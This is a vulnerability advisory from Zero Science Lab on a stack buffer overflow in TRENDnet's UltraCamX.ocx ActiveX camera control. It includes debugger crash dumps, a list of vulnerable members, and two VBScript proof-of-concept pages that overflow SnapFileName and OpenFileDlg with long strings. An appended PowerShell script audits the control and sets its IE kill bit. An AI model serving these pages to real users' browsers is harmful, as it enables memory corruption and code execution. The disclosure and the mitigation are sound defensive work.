zeroscience, Gjoko Krstic, ZSL-2014-5211
History: Nov 25, 2014 - 12:00 a.m.

TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF

2014-11-25 00:00:00
Gjoko Krstic
zeroscience.mk

AI Score: 7.9 High (Confidence: High)

CVSS2: 7.5 High

Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.407 Medium (Percentile: 97.2%)

Title: TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
Advisory ID: ZSL-2014-5211
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 25.11.2014

Summary

SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful dual-codec wireless network camera with the 2-way audio function that provides the high-quality image and on-the-spot audio via the Internet connection.

Description

The UltraCam ActiveX Control ‘UltraCamX.ocx’ suffers from a stack buffer overflow vulnerability when a large number of bytes is passed to several functions in UltraCamLib, resulting in memory corruption that overwrites several registers, including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code.

--------------------------------------------------------------------------------

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
--------------------------------------------------------------------------------

Vendor

TRENDnet - <http://www.trendnet.com>

Affected Version

TV-IP422WN/TV-IP422W

Tested On

Microsoft Windows 7 Professional SP1 (EN)

Vendor Status

N/A

PoC

trendnet_bof.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.exploit-db.com/exploits/35363/>
[2] <http://packetstormsecurity.com/files/129262>
[3] <http://cxsecurity.com/issue/WLB-2014110169>
[4] <http://osvdb.org/show/osvdb/115037>
[5] <http://www.securityfocus.com/bid/71292>
[6] <http://www.vfocus.net/art/20141126/11848.html>
[7] <http://www.scip.ch/en/?vuldb.68288>
[8] <http://xforce.iss.net/xforce/xfdb/98948>
[9] <http://secunia.com/advisories/60244/>
[10] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-10011>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-10011>

Changelog

[25.11.2014] - Initial release
[26.11.2014] - Added reference [3], [4] and [5]
[27.11.2014] - Added reference [6]
[02.12.2014] - Added reference [7] and [8]
[21.12.2014] - Added reference [9]
[17.01.2015] - Added reference [10] and [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF


Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W

Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.

Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when a large number of bytes is passed to several
functions in UltraCamLib, resulting in memory corruption that overwrites
several registers, including the SEH. An attacker can gain access to the
system of the affected node and execute arbitrary code.

-----------------------------------------------------------------------------

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

-----------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php


16.11.2014

---


Properties:
-----------

FileDescription		UltraCam ActiveX Control
FileVersion		1, 1, 52, 16
InternalName		UltraCamX
OriginalFileName	UltraCamX.ocx
ProductName		UltraCam device ActiveX Control
ProductVersion		1, 1, 52, 16


List of members:
----------------

Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
	RemoteHost
	RemotePort
	AccountCode
	GetConfigValue
	SetConfigValue
	SetCGIAPNAME
	Password
	UserName
	fChgImageSize
	ImgWidth
	ImgHeight
	SnapFileName
	AVIRecStart
	SetImgScale
	OpenFolder
	OpenFileDlg
	TriggerStatus
	AVIRecStatus
	Event_Frame
	PlayVideo
	SetAutoScale
	Event_Signal
	WavPlay
	CGI_ParamGet
	CGI_ParamSet
	MulticastEnable
	MulticastStatus
	SetPTUserAllow


Vulnerable members of the class:
--------------------------------

CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost


PoC(s):
-------


<object classid="clsid:E1B26101-23FB-4855-9171-F79F29CC7728" id="target"></object>
<script language="vbscript">
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(8212, "A")

target.SnapFileName = thricer

</script>


--

eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861        movzx   ecx,byte ptr [eax+61h]     ds:002b:414141a2=??

--



<object classid="clsid:E1B26101-23FB-4855-9171-F79F29CC7728" id="target"></object>
<script language="vbscript">
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(2068, "A")

target.OpenFileDlg thricer

</script>


--

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

--
</p></body></html>
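
The control in the PoCs is instantiated by CLSID from a web page, so a host-side containment is the Internet Explorer ActiveX kill bit for that CLSID. The following is an added example, not part of the advisory or of any vendor tooling: it reports whether the control is registered in the native and 32-bit registry views, which file version backs it, and whether the kill bit is set, and sets the bit only when run with `-Apply` (a switch defined by this script).

```powershell
# Added example: audit (and optionally kill-bit) the UltraCamX ActiveX control.
# -Apply is this script's own switch; without it nothing is changed.
param([switch]$Apply)

$clsid   = '{E1B26101-23FB-4855-9171-F79F29CC7728}'  # from the PoC <object> tags
$killBit = 0x400   # "Compatibility Flags" bit that stops IE from loading a control

# Native and 32-bit (WOW64) views: 32-bit IE on 64-bit Windows reads the second.
foreach ($root in 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node') {
    if (-not (Test-Path -LiteralPath $root)) { continue }

    # Is the control registered in this view, and which file backs it?
    $inproc  = "$root\Classes\CLSID\$clsid\InprocServer32"
    $file    = $null
    $version = $null
    if (Test-Path -LiteralPath $inproc) {
        $file = (Get-Item -LiteralPath $inproc).GetValue('')   # default value = path
        if ($file -and (Test-Path -LiteralPath $file)) {
            $version = (Get-Item -LiteralPath $file).VersionInfo.FileVersion
        }
    }

    # Current kill-bit state for this view.
    $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
    $flags  = 0
    if (Test-Path -LiteralPath $compat) {
        $flags = [int]((Get-Item -LiteralPath $compat).GetValue('Compatibility Flags', 0))
    }

    if ($Apply -and -not ($flags -band $killBit)) {
        # Create the key only when missing so existing values are preserved.
        if (-not (Test-Path -LiteralPath $compat)) {
            New-Item -Path $compat -Force | Out-Null
        }
        $flags = $flags -bor $killBit
        New-ItemProperty -Path $compat -Name 'Compatibility Flags' `
            -PropertyType DWord -Value $flags -Force | Out-Null
    }

    [pscustomobject]@{
        View       = $root
        Registered = [bool]$file
        File       = $file
        Version    = $version
        KillBitSet = [bool]($flags -band $killBit)
    }
}
```

Writing under HKLM requires an elevated session. The script checks machine-wide registrations only; a per-user registration under HKCU is not covered by this example.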
